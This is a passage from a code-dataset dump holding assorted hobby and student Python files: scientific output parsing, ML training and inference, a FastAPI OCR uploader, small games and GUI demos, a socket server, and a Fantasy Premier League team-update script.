file.\n\n\n written 2019 by Michael Böhme\n https://github.com/micb25/chemtools\n\n\"\"\"\n\n\nimport sys, re\n\nif ( (len(sys.argv) < 2) or (len(sys.argv) > 2) ):\n sys.exit(\"Usage: %s poly_aniso.output\" % ( sys.argv[0] ))\n\nfound_data = found_sep = False\n\ntry:\n susc = open(sys.argv[1], 'r')\n lines = susc.read().split(\"\\n\")\n susc.close()\nexcept:\n sys.exit(\"Can't read SINGLE_ANISO/POLY_ANISO output file '%s'!\" % ( sys.argv[1] ) )\n \ntry:\n for line in lines:\n if ( re.findall(r'^Units', line) ) and ( found_data == False ) and ( found_sep == False):\n found_data = True\n elif ( found_data == True ):\n if re.findall(r'^----', line):\n if ( found_sep == False ):\n found_sep = True\n else:\n break\n elif ( found_sep == True ) and ( line[0] == ' ' ):\n chit_data = re.findall(r'([0-9]*\\.[0-9]*)', line)\n print(\"%12.6f %18.12f %18.12f\" % ( float(chit_data[0]), float(chit_data[2]), float(chit_data[3]) ) )\n else:\n break\nexcept:\n sys.exit(\"SINGLE_ANISO/POLY_ANISO output file '%s' seems to be corrupt!\" % ( sys.argv[1] ) )\n \n","repo_name":"micb25/chemtools","sub_path":"extract_susc.py","file_name":"extract_susc.py","file_ext":"py","file_size_in_byte":1400,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"77"} +{"seq_id":"29535131468","text":"\"\"\"Audio Trainer v1.0\"\"\"\n# import of own scripts\nimport os\n\n# import of own scripts\nimport functions as f\nimport config as conf\n\n#manages all models that have been computed\ndef main():\n userWantNotToQuit = True\n models = f.loadModels()\n while userWantNotToQuit:\n print(\"Currently stored models:\")\n for i in range(len(models)):\n print(\"Nr. \" +\n str(i +\n 1) +\n \": \" +\n str(models[i].name) +\n \" | Frames:\\t\" +\n str(len(models[i].features)) +\n \" | Matches:\\t\" +\n str(models[i].matches) +\n \" | Influenced by:\\t\" +\n str(models[i].influencedBy) +\n \" | Threshold:\\t\" +\n str(models[i].threshold) +\n \" | Score:\\t\" +\n str(models[i].score) +\n \" | Loaded:\\t\" +\n str(models[i].loaded))\n print()\n printCommands()\n isUserInputWrong = True\n while isUserInputWrong:\n userInput = raw_input(\"What do you want to do? \")\n if userInput == \"a\":\n userInput = raw_input(\"Which model do you want to activate? \")\n try:\n selectedModel = int(userInput) - 1\n if selectedModel < len(models):\n if selectedModel >= 0:\n models[selectedModel].activate()\n f.storeSameModel(models[selectedModel])\n isUserInputWrong = False\n else:\n print(\"There are no models with a number smaller or equal 0.\")\n else:\n print(\"There is no model with such a high number.\")\n except ValueError:\n print(\"That was not a number\")\n elif userInput == \"d\":\n userInput = raw_input(\"Which model do you want to deactivate? \")\n try:\n selectedModel = int(userInput) - 1\n if selectedModel < len(models):\n if selectedModel >= 0:\n models[selectedModel].deactivate()\n f.storeSameModel(models[selectedModel])\n isUserInputWrong = False\n else:\n print(\"There are no models with a number smaller or equal 0.\")\n else:\n print(\"There is no model with such a high number.\")\n except ValueError:\n print(\"That was not a number\")\n elif userInput == \"del\":\n userInput = raw_input(\"Which model do you want to delete? \")\n try:\n selectedModel = int(userInput) - 1\n if selectedModel < len(models):\n if selectedModel >= 0:\n os.remove(conf.MODELS_DIR + \"/\" + models[selectedModel].name)\n models = f.loadModels()\n isUserInputWrong = False\n else:\n print(\"There are no models with a number smaller or equal 0.\")\n else:\n print(\"There is no model with such a high number.\")\n except ValueError:\n print(\"That was not a number\")\n elif userInput == \"r\":\n userInput = raw_input(\"Which model do you want to rename? \")\n try:\n selectedModel = int(userInput) - 1\n if selectedModel < len(models):\n if selectedModel >= 0:\n oldModelName = models[selectedModel].name\n newName = raw_input(\"Which name should this model have?\")\n models[selectedModel].name = newName\n f.storeModel(models[selectedModel])\n os.remove(conf.MODELS_DIR + \"/\" + oldModelName)\n isUserInputWrong = False\n else:\n print(\"There are no models with a number smaller or equal 0.\")\n else:\n print(\"There is no model with such a high number.\")\n except ValueError:\n print(\"That was not a number\")\n elif userInput == \"c\":\n userInput = raw_input(\"For which model do you want to change the path to the script? \")\n try:\n selectedModel = int(userInput) - 1\n if selectedModel < len(models):\n if selectedModel >= 0:\n oldScriptPath = models[selectedModel].script\n newPath = raw_input(\"Where is the script? (Current script is at \" + oldScriptPath + \". \")\n while os.path.isfile(newPath) == False:\n print(\"It seems that there is no script at \" + newPath)\n newPath = raw_input(\"Where is the script? (Current script is at \" + oldScriptPath + \". \")\n models[selectedModel].script = newPath\n f.storeSameModel(models[selectedModel])\n isUserInputWrong = False\n else:\n print(\"There are no models with a number smaller or equal 0.\")\n else:\n print(\"There is no model with such a high number.\")\n except ValueError:\n print(\"That was not a number\")\n elif userInput == \"h\":\n isUserInputWrong = False\n printCommands()\n elif userInput == \"q\":\n isUserInputWrong = False\n userWantNotToQuit = False\n else:\n print(\"That was not a valid input.\")\n\n#prints all possible commands\ndef printCommands():\n print(\"There are the following commands:\")\n print(\"\\ta\\t(a)ctivate a model\")\n print(\"\\td\\t(d)eactivate a model\")\n print(\"\\tdel\\t(del)ete a model\")\n print(\"\\tr\\t(r)ename a model\")\n print(\"\\th\\tprint this (h)elp again\")\n print(\"\\tc\\t(c)hange the path to the script that should be executed\")\n print(\"\\tq\\t(q)uit the model management\")\n","repo_name":"adiran/Bachelor","sub_path":"manageModels.py","file_name":"manageModels.py","file_ext":"py","file_size_in_byte":6483,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"23042345670","text":"import pandas as pd\r\nimport pickle\r\nimport os.path\r\nimport config\r\nfrom tqdm import tqdm\r\n\r\nfrom pathlib import Path\r\nfrom sklearn.base import TransformerMixin\r\nfrom sklearn.base import BaseEstimator\r\n\r\nfrom imageai.Detection import ObjectDetection\r\n\r\n\r\n\r\nclass ImageTagsTransformer (BaseEstimator, TransformerMixin):\r\n \"\"\"\r\n Obtain sentences tokenized\r\n\r\n \"\"\"\r\n\r\n def __init__ (self, cache_file = '', image_path = 'images', field = ''):\r\n \"\"\"\r\n @param model String (see Config)\r\n @param cache_file String\r\n @param image_path String\r\n @param field String\r\n \"\"\"\r\n super().__init__()\r\n \r\n self.suggested_field = 'twitter_id'\r\n self.model = config.computer_vision['yolo']\r\n self.cache_file = cache_file\r\n self.field = field or self.suggested_field\r\n self.image_path = image_path\r\n self.columns = None\r\n self.temp_folder = ''\r\n \r\n \r\n # Return self nothing else to do here\r\n def fit (self, X, y = None):\r\n return self \r\n \r\n def transform (self, X, **transform_params):\r\n \r\n # Return tokens from cache\r\n if self.cache_file and os.path.exists (self.cache_file):\r\n \r\n # @var features_df DataFrame\r\n features_df = pd.read_csv (self.cache_file, header = 0, sep = ',')\r\n return features_df\r\n\r\n # Settings\r\n detector = ObjectDetection ()\r\n detector.setModelTypeAsYOLOv3 ()\r\n detector.setModelPath (self.model)\r\n detector.loadModel ()\r\n \r\n \r\n # @var probabilities List\r\n probabilities = []\r\n \r\n \r\n # @var labels Set\r\n labels = set ()\r\n \r\n \r\n # @var minimum_percentage_probability int\r\n minimum_percentage_probability = 51\r\n \r\n \r\n # Detect\r\n for index, row in tqdm (X.iterrows (), total = len (X.index)):\r\n \r\n # @var image_path String\r\n image_path = os.path.join (self.image_path, row[self.field])\r\n \r\n \r\n # @var detections\r\n _, detections = detector.detectObjectsFromImage (\r\n input_image = image_path,\r\n output_type = 'array',\r\n minimum_percentage_probability = minimum_percentage_probability\r\n )\r\n \r\n \r\n # Attach probabilities\r\n probabilities.append ([(d['name'], d['percentage_probability']) for d in detections])\r\n \r\n \r\n # Attach labels\r\n for d in detections:\r\n labels.add (d['name'])\r\n \r\n \r\n # @var w int width\r\n # @var h int height\r\n w, h = len (labels), len (X.index)\r\n \r\n \r\n # @var labels list\r\n labels = list (labels)\r\n \r\n \r\n # @var matrix List\r\n matrix = [[0 for x in range(w)] for y in range(h)] \r\n \r\n \r\n # Fill the gaps\r\n for row_index, probability in enumerate (probabilities):\r\n for entity in probability:\r\n column_index = labels.index (entity[0])\r\n matrix[row_index][column_index] = entity[1]\r\n \r\n \r\n # @var df_features DataFrame\r\n features = pd.DataFrame (matrix, columns = labels)\r\n \r\n \r\n # Store\r\n if self.cache_file:\r\n features.to_csv (self.cache_file, index = False)\r\n ","repo_name":"Smolky/umuteam-emothreat-2022","sub_path":"code/features/ImageTagsTransformer.py","file_name":"ImageTagsTransformer.py","file_ext":"py","file_size_in_byte":3492,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"1432101549","text":"import glob\nimport os\n\nimport cv2\nfrom keras.callbacks import CSVLogger\n\nfrom SegNet import LoadData\nfrom SegNet.VggSegNet import VGGSegnet, np\nfrom class_mappings import cmap\nfrom config import *\n\n\ndef train(save_weights_path, train_images_path, train_segs_path, val_images_path, val_segs_path):\n unwanted_width = IMAGE_WIDTH\n unwanted_height = IMAGE_HEIGHT\n\n newest_model = save_weights_path + '.newest'\n\n train_batch_size = BATCH_SIZE\n val_batch_size = BATCH_SIZE\n n_classes = NO_CLASSES\n\n output_height = IMAGE_HEIGHT\n output_width = IMAGE_WIDTH\n\n m = VGGSegnet(n_classes, unwanted_height, unwanted_width)\n\n if os.path.isfile(newest_model):\n m.load_weights(newest_model)\n\n m.compile(loss='categorical_crossentropy',\n optimizer='adadelta',\n metrics=['accuracy'])\n\n G = LoadData.imageSegmentationGenerator(train_images_path, train_segs_path, train_batch_size, n_classes,\n unwanted_height, unwanted_width, output_height, output_width)\n\n G2 = LoadData.imageSegmentationGenerator(val_images_path, val_segs_path, val_batch_size, n_classes, unwanted_height,\n unwanted_width, output_height, output_width)\n csv_logger = CSVLogger('log.csv', append=True, separator=';')\n ep = 1\n while True:\n m.fit_generator(G, 25, validation_data=G2, validation_steps=5, epochs=1, callbacks=[csv_logger], verbose=2)\n # list all data in history\n\n m.save_weights(save_weights_path + \".\" + str(ep))\n m.save_weights(save_weights_path + \".newest\")\n ep += 1\n\n\ndef predict(m, epoch):\n images_path = TO_PREDICT_DIR\n images_out_path = PREDICTED_OUTPUT_DIR\n images = glob.glob(images_path + \"*.jpg\") + glob.glob(images_path + \"*.png\") + glob.glob(images_path + \"*.jpeg\")\n images.sort()\n\n colors = cmap\n\n for imgName in images:\n out_name = imgName.replace(images_path, images_out_path)\n path, name = out_name.rsplit('\\\\', 1)\n out_name = path + '\\\\' + str(epoch) + '__' + name\n x = LoadData.getImageArr(imgName, IMAGE_WIDTH, IMAGE_HEIGHT)\n pr = m.predict(np.array([x]))[0]\n pr = pr.reshape((IMAGE_HEIGHT, IMAGE_WIDTH, NO_CLASSES)).argmax(axis=2)\n seg_img = np.zeros((IMAGE_HEIGHT, IMAGE_WIDTH, 3))\n for c in range(NO_CLASSES):\n seg_img[:, :, 0] += ((pr[:, :] == c) * (colors[c][0])).astype('uint8')\n seg_img[:, :, 1] += ((pr[:, :] == c) * (colors[c][1])).astype('uint8')\n seg_img[:, :, 2] += ((pr[:, :] == c) * (colors[c][2])).astype('uint8')\n seg_img = cv2.resize(seg_img, (IMAGE_WIDTH, IMAGE_HEIGHT))\n cv2.imwrite(out_name, seg_img)\n","repo_name":"admal/DeepLearningSegmentation","sub_path":"SegNet/PrepareModel.py","file_name":"PrepareModel.py","file_ext":"py","file_size_in_byte":2725,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"7582789169","text":"from fastapi import FastAPI, UploadFile, File, Request\nimport base64\nfrom datetime import datetime\nimport cv2\nimport numpy as np\nimport requests\nfrom paddleocr import PaddleOCR\n\nocr = PaddleOCR(use_angle_cls=True, lang='en')\n\ndef image_to_cv2(image_data):\n nparr = np.frombuffer(image_data, np.uint8)\n img_cv2 = cv2.imdecode(nparr, cv2.IMREAD_COLOR)\n return img_cv2\n\ndef string_to_date(date_string):\n date_object = datetime.strptime(date_string, '%d-%m-%Y').date()\n return date_object\n\ndef call_post_api(data, api_url):\n headers = {'Content-Type': 'application/json'}\n response = requests.post(api_url, json=data, headers=headers)\n print(response)\n print(data)\n if response.status_code == 200:\n print(\"Gửi dữ liệu thành công!\")\n else:\n print(\"Gửi dữ liệu không thành công. Mã lỗi:\", response.status_code)\n\napp = FastAPI()\n\n@app.post(\"/upload_invoice/\")\nasync def upload_invoice(file: UploadFile = File(...), request: Request = None):\n contents = await file.read()\n image_cv2 = image_to_cv2(contents)\n result = ocr.ocr(image_cv2, cls=True)\n current_datetime = datetime.now()\n id_user = request.query_params.get(\"meter_serial_number\", None)\n total_price = int(result[0][2][1][0])\n total_price = int(total_price / 10) + total_price % 10 / 10\n print(total_price)\n print(id_user)\n encoded_image = base64.b64encode(contents).decode('utf-8')\n api_url = 'https://btliot-production.up.railway.app/api/v1/consumption'\n data = {\n \"meter_serial_number\": id_user,\n \"current_reading\": total_price,\n \"electricity_rate\": 4000,\n \"electricity_month\": int(current_datetime.timestamp()),\n }\n call_post_api(data, api_url)\n \n return {\"total_price\": total_price, \"image\": encoded_image}\n","repo_name":"Nguyenquanghanhd20ptit/btl_IOT","sub_path":"electricity-ai/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1805,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"17334359398","text":"import pygame\r\nfrom tank import Tank\r\nimport arena\r\nimport collision\r\n# from bulletclass import Bullet\r\n\r\n\r\nclass Game(object):\r\n def __init__(self, width=800, height=600):\r\n self.width = width\r\n self.height = height\r\n self.screen = pygame.display.set_mode((self.width, self.height))\r\n pygame.display.set_caption(\"Combat\")\r\n\r\n self.clock = pygame.time.Clock()\r\n\r\n self.game_over = False\r\n\r\n self.player_1 = Tank(70, 340, '1')\r\n self.bullets_1 = self.player_1.get_player_bullets()\r\n self.player_2 = Tank(730, 340, '2')\r\n self.bullets_2 = self.player_2.get_player_bullets()\r\n\r\n self.wall_list = arena.create_arena()\r\n\r\n self.game_loop = True\r\n\r\n def run(self):\r\n\r\n while self.game_loop:\r\n self.clock.tick(60)\r\n if not self.game_over:\r\n for b in self.bullets_1:\r\n b.move()\r\n for b in self.bullets_2:\r\n b.move()\r\n\r\n keys = pygame.key.get_pressed()\r\n if keys[pygame.K_a]:\r\n self.player_1.turn_left()\r\n if keys[pygame.K_d]:\r\n self.player_1.turn_right()\r\n if keys[pygame.K_w]:\r\n self.player_1.move()\r\n\r\n if keys[pygame.K_LEFT]:\r\n self.player_2.turn_left()\r\n if keys[pygame.K_RIGHT]:\r\n self.player_2.turn_right()\r\n if keys[pygame.K_UP]:\r\n self.player_2.move()\r\n\r\n for event in pygame.event.get():\r\n if event.type == pygame.QUIT:\r\n self.game_loop = False\r\n if event.type == pygame.KEYDOWN:\r\n if event.key == pygame.K_s:\r\n if not self.game_over:\r\n self.player_1.shoot()\r\n if event.key == pygame.K_DOWN:\r\n if not self.game_over:\r\n self.player_2.shoot()\r\n\r\n collision.tank_collision(self.player_1, self.player_2)\r\n collision.tank_collision(self.player_2, self.player_1)\r\n for wall in self.wall_list:\r\n collision.wall_collision(self.player_1, wall)\r\n collision.wall_collision(self.player_2, wall)\r\n\r\n # update self.screen\r\n self.screen.fill(((151, 163, 67, 255)))\r\n self.player_1.draw(self.screen)\r\n self.player_2.draw(self.screen)\r\n for b in self.bullets_1:\r\n b.draw(self.screen)\r\n for b in self.bullets_2:\r\n b.draw(self.screen)\r\n for wall in self.wall_list:\r\n pygame.draw.rect(self.screen, (253, 181, 104, 255), wall)\r\n pygame.display.update()\r\n\r\n\r\ngame = Game(800, 600)\r\ngame.run()\r\n","repo_name":"rayanemferreira/lpc","sub_path":"PyGameTankPongOO/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2873,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"77"} +{"seq_id":"9184770247","text":"\r\n\r\ndef idle(S: str):\r\n sw=0 #счетчик свободных мест (с учетом ограничений COVID-19)\r\n k=0 #счетчик пустых мест\r\n j=0 #счетчик занимаемых мест (чтоб отступать от занятого места)\r\n i=0 #счетчик итераций\r\n while i<(len(S)-1):\r\n if (S[i] == '0') and (S[i+1]== '0'):\r\n k+=1\r\n if j==0:\r\n sw+=1\r\n j+=1\r\n else:\r\n j-=1\r\n elif S[i]=='1':\r\n k = -1\r\n \r\n i+=1\r\n\r\n return sw\r\n \r\n \r\nP = str(input('Введите строку типа: 0100110001 где: \\n0 - пустое место пляжа \\n1 - занятое место пляжа\\n'))\r\n\r\nprint(idle(P))\r\n","repo_name":"MrinskiyAndrey/Homework","sub_path":"13.py","file_name":"13.py","file_ext":"py","file_size_in_byte":817,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"37039755286","text":"import datetime\n\nfrom simplequant.strategy.basestrategy import BaseStrategy\nfrom simplequant.backtest.event import SignalEvent\nfrom simplequant.constant import Direction, OrderTime\n\n\nclass DoubleMovingAverageStrategy(BaseStrategy):\n \"\"\"\n 演示策略3:双均线策略。当短均线上穿长均线时买入股票,当短均线下穿长均线时卖出所有股票。\n \"\"\"\n\n def __init__(self, portfolio):\n self.symbol = '000651.XSHE' # 格力电器\n self.short = 5\n self.long = 30\n self.field = 'close'\n self.quantity = 1000\n self.api.auth('13802947200', '947200')\n\n def handleBar(self, events_queue, event):\n date = datetime.datetime.strptime(str(event.datetime), '%Y%m%d')\n bars = self.api.get_price(self.symbol, end_date=date, count=self.long+1, frequency='daily')\n short_average = bars[self.field].rolling(self.short).mean()\n long_average = bars[self.field].rolling(self.long).mean()\n\n if short_average.iloc[-1] > long_average.iloc[-1] and short_average.iloc[-2] <= long_average.iloc[-2]:\n signal_event = SignalEvent(event.datetime, self.symbol, Direction.LONG, self.quantity, OrderTime.OPEN)\n events_queue.put((signal_event.priority, signal_event))\n elif short_average.iloc[-1] < long_average.iloc[-1] and short_average.iloc[-2] >= long_average.iloc[-2]:\n signal_event = SignalEvent(event.datetime, self.symbol, Direction.NET, self.quantity, OrderTime.OPEN)\n events_queue.put((signal_event.priority, signal_event))\n\n","repo_name":"benjaminkz/simplequant","sub_path":"simplequant/strategy/double_moving_average_strategy.py","file_name":"double_moving_average_strategy.py","file_ext":"py","file_size_in_byte":1567,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"6402559808","text":"#!/usr/bin/env python3\n\nimport pandas as pd\nimport os\n\ndef snow_depth():\n f = os.path.dirname(os.path.realpath(__file__)) + \"/kumpula-weather-2017.csv\"\n df = pd.read_csv(f)\n return df[\"Snow depth (cm)\"].max()\n\ndef main():\n depth = snow_depth()\n print(f\"Max snow depth: {depth:2.1f}\")\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"DU-ds/PythonDataAnalysisCourse","sub_path":"hy-data-analysis-with-python-summer-2019/part04-e09_snow_depth/src/snow_depth.py","file_name":"snow_depth.py","file_ext":"py","file_size_in_byte":338,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"73519721847","text":"import subprocess\nimport os\n\nWINDOW_SIZE = 1\nRUNNER = 'DataflowRunner'\nPROJECT_ID = 'big-d-project-404815'\nREGION = 'europe-central2'\nBUCKET_NAME = 'big-d-project-master-dataset'\n\ncommand = [\n 'python', \n './bitcoin_dataflow.py',\n f'--project={PROJECT_ID}',\n f'--region={REGION}',\n f'--window_size={WINDOW_SIZE}',\n f'--runner={RUNNER}',\n f'--temp_location=gs://{BUCKET_NAME}/temp'\n]\n\ntry:\n subprocess.run(command, check=True)\nexcept subprocess.CalledProcessError as e:\n print(f\"Error: {e}\")","repo_name":"warsaw-ml/big-d","sub_path":"dataflow/run_dataflow.py","file_name":"run_dataflow.py","file_ext":"py","file_size_in_byte":517,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"29432263179","text":"# por favor escribe aquí tu función\ndef es_primo(num, n=2):\n if num == 1: \n return False\n if num > 1:\n cont = 0\n for i in range(n,num):\n resta = num%i\n if resta == 0:\n cont += 1\n if cont == 0:\n return True\n else:\n return False","repo_name":"pabloschwarzenberg/grader","sub_path":"tema2_p1/tema2_p1_64ee2d10b8ea2f2a60c506ddc7a38f2a.py","file_name":"tema2_p1_64ee2d10b8ea2f2a60c506ddc7a38f2a.py","file_ext":"py","file_size_in_byte":320,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"17939961788","text":"import http\nimport unittest\nimport uuid\n\nfrom api.tests.common import client\n\n\nclass TestBuilding(unittest.TestCase):\n def test_create_building(self):\n create_user_body = {\n 'name': 'Dummy Name',\n 'document': str(uuid.uuid4()),\n 'address': 'Dummy Address',\n 'email': 'a@a.com',\n 'cellphone': '0800',\n }\n response = client.post(\n '/users/',\n json=create_user_body,\n )\n\n self.assertEqual(response.status_code, http.HTTPStatus.CREATED)\n data = response.json()\n user_id = data['id']\n\n create_building_body = {\n 'name': 'Dummy Building',\n 'address': 'Dummy Address',\n 'description': 'Dummy Description',\n }\n\n response = client.post(f'/users/{user_id}/buildings', json=create_building_body)\n\n self.assertEqual(response.status_code, http.HTTPStatus.CREATED)\n self.assertIsNotNone(response.text)\n data = response.json()\n self.assertEqual(data['name'], 'Dummy Building')\n self.assertIn('id', data)\n self.assertEqual(data['owner_id'], user_id)\n self.assertEqual(data['address'], 'Dummy Address')\n self.assertEqual(data['description'], 'Dummy Description')\n","repo_name":"gilMars/renting-building-api","sub_path":"api/tests/test_buildings.py","file_name":"test_buildings.py","file_ext":"py","file_size_in_byte":1285,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"15945267605","text":"from tkinter import *\nfrom PIL import ImageTk, Image\n\nroot = Tk()\nroot.title(\"Radio Buttons\")\n\n#r = IntVar()\n\nMODES = [\n (\"Pepperoni\", \"Pepperoni\"), # display - value\n (\"Cheese\", \"Cheese\"),\n (\"Mushroom\", \"Mushroom\"),\n (\"Onion\", \"Onion\"),\n]\n\npizza = StringVar()\n#pizza.set(\"Pepperoni\")\n\nfor text, mode in MODES:\n Radiobutton(root, text=text, variable=pizza, value=mode).pack()\n\n\n\ndef clicked(option):\n myLabel = Label(root, text=option)\n myLabel.pack()\n\n#Radiobutton(root, text=\"Option 1\", variable=r, value=1, command=lambda: clicked(r.get())).pack()\n#Radiobutton(root, text=\"Option 2\", variable=r, value=2, command=lambda: clicked(r.get())).pack()\n\nmyButton = Button(root, text=\"Click Me\", command=lambda: clicked(pizza.get()))\nmyButton.pack()\n\nroot.mainloop()","repo_name":"smamirov/tkinterTutorial","sub_path":"radio.py","file_name":"radio.py","file_ext":"py","file_size_in_byte":783,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"19650869039","text":"from socket import *\nfrom time import ctime\n# 时间戳服务器\nhost = ''\nbufferSize = 1024\nport = 9876\naddr = (host,port)\ntcpServerSocket = socket(AF_INET, SOCK_STREAM)\ntcpServerSocket.bind(addr)\ntcpServerSocket.listen(5)\nwhile True:\n print('正在等待客户端连接')\n tcpClientSocket,addr = tcpServerSocket.accept()\n print('客户端已经连接','addr','=',addr)\n while True:\n data = tcpClientSocket.recv(bufferSize)\n if not data:\n break;\n tcpClientSocket.send(ctime().encode(encoding='utf-8') + b' ' + data)\n tcpClientSocket.close()\ntcpServerSocket.close();\n ","repo_name":"moqifeiliuming/code","sub_path":"CODE/chapter15/demo15.04.py","file_name":"demo15.04.py","file_ext":"py","file_size_in_byte":622,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"77"} +{"seq_id":"11423775677","text":"import functions\nimport re\nmaterialsDict={}\ncookiesDict={}\n\nnumberOfMaterials=input(\"number of materials: \\n\")\nfor x in range(int(numberOfMaterials)):\n inputed = input(\"material: \\n\")\n words=inputed.split()\n if words[0]==\"add\":\n functions.adding_materials(materialsDict,words[1],words[2])\nprint(materialsDict)\n\nnumberOfCookies=input(\"number of cookies: \\n\")\nfor x in range(int(numberOfCookies)):\n inputed = input(\"cookie: \\n\")\n new_inputed=re.sub(\":\",\" \",inputed)\n new_inputed=re.sub(\",\",\" \",new_inputed)\n words=new_inputed.split()\n # print(words)\n # print(new_inputed, len(words))\n number_of_elements_per_cookie = int((len(words)-4)/2)\n if (words[0]==\"define\" and words[1]==\"suit\"):\n functions.defining_cookies(cookiesDict,words[2],words[3],number_of_elements_per_cookie,words)\nprint(cookiesDict)\n","repo_name":"bahramhay/project_testclass_one","sub_path":"myapplication/input_dictionary.py","file_name":"input_dictionary.py","file_ext":"py","file_size_in_byte":845,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"72143916409","text":"from picker import calc_weights\nimport requests\nimport json \nimport pandas as pd\nfrom datetime import datetime, timedelta\n\ncolumns = ['chance_of_playing_next_round', 'chance_of_playing_this_round', 'code',\n 'element_type', 'ep_next',\n 'ep_this', 'first_name', 'form', 'id', 'in_dreamteam',\n 'now_cost', 'points_per_game',\n 'second_name', 'selected_by_percent', \n 'team', 'team_code', 'total_points', 'transfers_in',\n 'transfers_out',\n 'value_form', 'value_season', 'web_name', \n 'influence', 'creativity', 'threat',\n 'ict_index']\n\ndef update_team(email, password, id):\n \n session = requests.session()\n\n players_df, fixtures_df, gameweek=get_data()\n\n data = {'login' : email, 'password' : password, 'app' : 'plfpl-web', 'redirect_uri' : 'https://fantasy.premierleague.com/'}\n login_url = \"https://users.premierleague.com/accounts/login/\"\n \n t=session.post(url=login_url, data=data)\n url = \"https://fantasy.premierleague.com/api/my-team/\" + str(id)\n team = session.get(url)\n team = json.loads(team.content)\n\n bank = team['transfers']['bank']\n\n players = [x['element'] for x in team['picks']]\n\n my_team = players_df.loc[players_df.id.isin(players)]\n potential_players = players_df.loc[~players_df.id.isin(players)]\n\n player_out = calc_out_weight(my_team)\n rows_to_drop=player_out.index.values.astype(int)[0]\n my_team=my_team.drop(rows_to_drop)\n\n position = player_out.element_type.iat[0]\n out_cost = player_out.now_cost.iat[0]\n budget = bank + out_cost\n dups_team = my_team.pivot_table(index=['team'], aggfunc='size')\n invalid_teams = dups_team.loc[dups_team==3].index.tolist()\n\n potential_players=potential_players.loc[~potential_players.team.isin(invalid_teams)]\n potential_players=potential_players.loc[potential_players.element_type==position]\n potential_players = potential_players.loc[potential_players.now_cost<=budget]\n\n player_in = calc_in_weights(potential_players, fixtures_df)\n my_team = my_team.append(player_in)\n my_team = calc_starting_weight(my_team)\n my_team =my_team.sort_values('weight', ascending=False)\n\n goalies = my_team.loc[my_team.element_type==1]\n\n\n outfied_players = my_team.loc[my_team.element_type!=1]\n\n captain = outfied_players.id.iat[0]\n vice_captain = outfied_players.id.iat[1]\n\n starters = goalies.head(1).append(outfied_players[:10])\n subs = goalies.tail(1).append(outfied_players[10:])\n\n headers = {'content-type': 'application/json', 'origin': 'https://fantasy.premierleague.com', 'referer': 'https://fantasy.premierleague.com/transfers'}\n transfers = [{\"element_in\" : int(player_in.id.iat[0]), \"element_out\" : int(player_out.id.iat[0]),\"purchase_price\": int(player_in.now_cost.iat[0]), \"selling_price\" : int(player_out.now_cost.iat[0])}]\n transfer_payload = { \"transfers\" : transfers,\"chip\" : None,\"entry\" : id,\"event\" : int(gameweek)}\n url = 'https://fantasy.premierleague.com/api/transfers/'\n print(\"Transferring Out: \" + player_out.web_name.iat[0] + \", Transferring In: \" + player_in.web_name.iat[0])\n print(\"Starters: \" + str(starters.web_name.tolist()))\n print(\"Subs: \" + str(subs.web_name.tolist()))\n t=session.post(url=url, data=json.dumps(transfer_payload), headers=headers)\n \n picks =[]\n count = 1\n for i in range(1,5):\n players = starters.loc[starters.element_type==i]\n ids = players.id.tolist()\n for ide in ids:\n if ide == captain:\n player = {\"element\" : ide, \"is_captain\" : True, \"is_vice_captain\" : False, \"position\" : count}\n elif ide == vice_captain:\n player = {\"element\" : ide, \"is_captain\" : False, \"is_vice_captain\" : True, \"position\" : count}\n else:\n player = {\"element\" : ide, \"is_captain\" : False, \"is_vice_captain\" : False, \"position\" : count}\n picks.append(player.copy())\n count+=1\n ids = subs.id.tolist()\n for ide in ids:\n player = {\"element\" : ide, \"is_captain\" : False, \"is_vice_captain\" : False, \"position\" : count}\n picks.append(player.copy())\n count+=1\n team_sheet = {\"picks\" : picks,\"chip\" : None}\n headers = {'content-type': 'application/json', 'origin': 'https://fantasy.premierleague.com', 'referer': 'https://fantasy.premierleague.com/my-team'}\n url = 'https://fantasy.premierleague.com/api/my-team/'+str(id) + '/'\n t=session.post(url=url, json=team_sheet,headers=headers)\n\ndef get_data():\n\n \n players = get('https://fantasy.premierleague.com/api/bootstrap-static/')\n players_df = pd.DataFrame(players['elements'])\n teams_df = pd.DataFrame(players['teams'])\n fixtures_df = pd.DataFrame(players['events'])\n today = datetime.now().timestamp()\n fixtures_df = fixtures_df.loc[fixtures_df.deadline_time_epoch>today]\n # if check_update(fixtures_df) == False:\n # print(\"Deadline Too Far Away\")\n # exit(0)\n gameweek = fixtures_df.iloc[0].id\n players_df = players_df[columns]\n players_df.chance_of_playing_next_round = players_df.chance_of_playing_next_round.fillna(100.0)\n players_df.chance_of_playing_this_round = players_df.chance_of_playing_this_round.fillna(100.0)\n fixtures = get('https://fantasy.premierleague.com/api/fixtures/?event='+str(gameweek))\n fixtures_df = pd.DataFrame(fixtures)\n\n fixtures_df=fixtures_df.drop(columns=['id'])\n teams=dict(zip(teams_df.id, teams_df.name))\n players_df['team_name'] = players_df['team'].map(teams)\n fixtures_df['team_a_name'] = fixtures_df['team_a'].map(teams)\n fixtures_df['team_h_name'] = 